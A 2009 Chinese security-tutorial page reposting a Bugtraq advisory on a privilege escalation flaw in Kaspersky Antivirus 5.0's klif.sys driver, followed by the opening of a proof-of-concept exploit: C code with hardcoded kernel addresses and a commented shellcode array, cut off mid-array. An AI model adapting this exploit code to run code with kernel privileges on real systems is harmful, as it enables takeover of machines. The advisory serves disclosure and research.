当前位置: 首页 > 图文教程 > 网络安全 > 安全基础 > Kaspersky杀毒软件klif.sys权限提升漏洞

安全基础
网管技术:常见BIOS报错信息及解决方法
分布式拒绝服务(DDOS)攻击及防范研究
四种宽带接入方式及其传输速率
网管必读 解读无线网络的七大安全困惑
经验:识别系统的非法进程及剿杀
全面清除系统垃圾的方法
QQ、网游等账号防盗防骗的实用小经验
上网前保证Windows XP系统安全的办法
七种DDoS攻击技术方法简介
硬盘与内存检测 四种查毒绝招
当网站注册时输入验证码总是不正确解决方法
不让自己的秘密留在别人的电脑中
IE崩溃遭难不求人 快速简单处理方法
损招 让应用程序莫名其妙地失效
不再弹广告 破除隐身僵尸木马的隐身妖术
利用QQ传播 网络欺骗“绑架”奥运会
渗透测试的攻与守 认清网络面临的问题
手动剿杀“上兴远程控制”木马
个人电脑防黑客入侵八准则
关注Windows系统服务中的安全隐患

安全基础 中的 Kaspersky杀毒软件klif.sys权限提升漏洞


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-28   浏览: 31 ::
收藏到网摘: n/a

受影响系统:
Kaspersky Labs Kaspersky Antivirus 5.0.335
Kaspersky Labs Kaspersky Antivirus 5.0.228
Kaspersky Labs Kaspersky Antivirus 5.0.227
描述:
------------------------------------------
BUGTRAQ  ID: _blank>13878

Kaspersky是一款非常流行的杀毒软件。

Microsoft Windows 2000平台的Kaspersky软件设计上存在漏洞,本地攻击者可能利用此漏洞提升自己的权限。

起因是Kaspersky内核驱动klif.sys没有正确丢弃高权限,攻击者可能利用这个漏洞以系统内核的权限执行任意代码。

<*来源:Ilya Rabinovich ([email protected]
  
  链接:_blank>http://marc.theaimsgroup.com/?l=bugtraq&m=111817777430401&w=2
*>

测试方法:
------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

//(C) by Ilya Rabinovich.

#include <windows.h>

PUCHAR pCodeBase=(PUCHAR)0xBE9372C0;

PDWORD pJmpAddress=(PDWORD)0xBE9372B0;

PUCHAR pKAVRets[]={(PUCHAR)0xBE935087,(PUCHAR)0xBE935046};

PUCHAR pKAVRet;


unsigned char code[]={0x68,0x00,0x02,0x00,0x00,    //push 0x200
                    0x68,0x00,0x80,0x93,0xBE,    //push <buffer address> - 0xBE938000
                    0x6A,0x00,                    //push 0  
                    0xB8,0x00,0x00,0x00,0x00,    //mov eax,<GetModuleFileNameA> -> +13
                    0xFF,0xD0,                    //call eax
                    0x68,0x00,0x80,0x93,0xBE,    //push <buffer address>
                    0x68,0x00,0x82,0x93,0xBE,    //push <address of the notepad path>- 0xBE938200
                    0xB8,0x00,0x00,0x00,0x00,    //mov eax,<lstrcmpiA> -> +30
                    0xFF,0xD0,                    //call eax
                    0x85,0xC0,                    //test eax,eax
                    0x74,0x03,                    //je +03
                    0xC2,0x04,0x00,                //retn 4
                    0x6A,0x00,                    //pu